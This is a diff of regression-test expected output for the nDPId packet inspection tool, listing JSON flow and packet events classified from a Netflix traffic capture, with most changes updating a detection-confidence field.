{"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117826,"flow_last_seen":1484319117826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117826,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1484319117826,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117826,"pkt":"gCqoTGHM5JjWH70UCABFAABAF8hAAEAGDxPAqAEHNCkeBdABAbshc+whAAAAALAC\/\/8t3QAAAgQFtAEDAwUBAQgKH2X2iwAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117827,"flow_last_seen":1484319117827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1484319117827,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117827,"pkt":"gCqoTGHM5JjWH70UCABFAABADR1AAEAGGb7AqAEHNCkeBdACAbuRqNIFAAAAALAC\/\/\/XwQAAAgQFtAEDAwUBAQgKH2X2jAAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6809,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1484319117879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117879,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGPL80KR4FwKgBBwG70AFaPMiyIXPsIqASOJC25AAAAgQFtAQCCAqh\/YpsH2X2iwEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1484319117881,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117881,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BiRAAEAGIMPAqAEHNCkeBdABAbshc+wiWjzIs4AQEBUN+QAAAQEICh9l9r+h\/Yps"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6811,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117826,"flow_last_seen":1484319117885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6811,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117826,"flow_last_seen":1484319117885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1484319117886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117886,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG70ALhlhIJkajSBqASOJCQFwAAAgQFtAQCCAqh\/YptH2X2jAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6813,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1484319117890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117890,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Pr9AAEAG6CfAqAEHNCkeBdACAbuRqNIG4ZYSCoAQEBXnJgAAAQEICh9l9sWh\/Ypt"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6814,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117827,"flow_last_seen":1484319117892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117892,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6821,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117826,"flow_last_seen":1484319117930,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117930,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6828,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117827,"flow_last_seen":1484319117942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117942,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6814,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117827,"flow_last_seen":1484319117892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117892,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6821,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117826,"flow_last_seen":1484319117930,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117930,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6828,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117827,"flow_last_seen":1484319117942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117942,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1484319118629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1484319118629,"pkt":"gCqoTGHM5JjWH70UCABFAABDkmsAAP8RpeXAqAEHwKgBAd8FADUALzVHkfABAAABAAAAAAAABWExOTA3BGRzY2cGYWthbWFpA25ldAAAAQAB"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1484319118652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1484319118652,"pkt":"5JjWH70UgCqoTGHMCABFAABj4U1AAEAR1ePAqAEBwKgBBwA13wUATx78kfCBgAABAAIAAAAABWExOTA3BGRzY2cGYWthbWFpA25ldAAAAQABwAwAAQABAAAADAAEuBnMCsAMAAEAAQAAAAwABLgZzBk="} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319118652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.10"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319118652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.10"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118657,"flow_last_seen":1484319118657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118657,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1484319118657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319118657,"pkt":"gCqoTGHM5JjWH70UCABFAABAL91AAEAGxQfAqAEHuBnMCtADAFAmSxL9AAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118658,"flow_last_seen":1484319118658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118658,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -341,70 +341,70 @@ 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1484319118674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118674,"pkt":"gCqoTGHM5JjWH70UCABFAAA0XA9AAEAGmOHAqAEHuBnMCtADAFAmSxL+8j0E\/YAQEBWcSwAAAQEICh9l+cD\/\/WqN"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1484319118674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319118674,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0ASr4P0LxYJGIqAScSCIdgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1484319118675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118675,"pkt":"gCqoTGHM5JjWH70UCABFAAA0us1AAEAGOiPAqAEHuBnMCtAEAFDFgkYiq+D9DIAQEBUYOwAAAQEICh9l+cH\/\/WqN"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6906,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118657,"flow_last_seen":1484319118676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118676,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/4e36d\/6289889020d6cc6dfb3038c35564a41e1ca4e36d.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118658,"flow_last_seen":1484319118687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118687,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/8b1fa\/eaa1b78cd72ca4dbdcab527691d2fcab37c8b1fa.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1484319036854,"flow_last_seen":1484319110632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":194464,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319032896,"flow_last_seen":1484319033215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6570,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319049684,"flow_last_seen":1484319050696,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12666,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 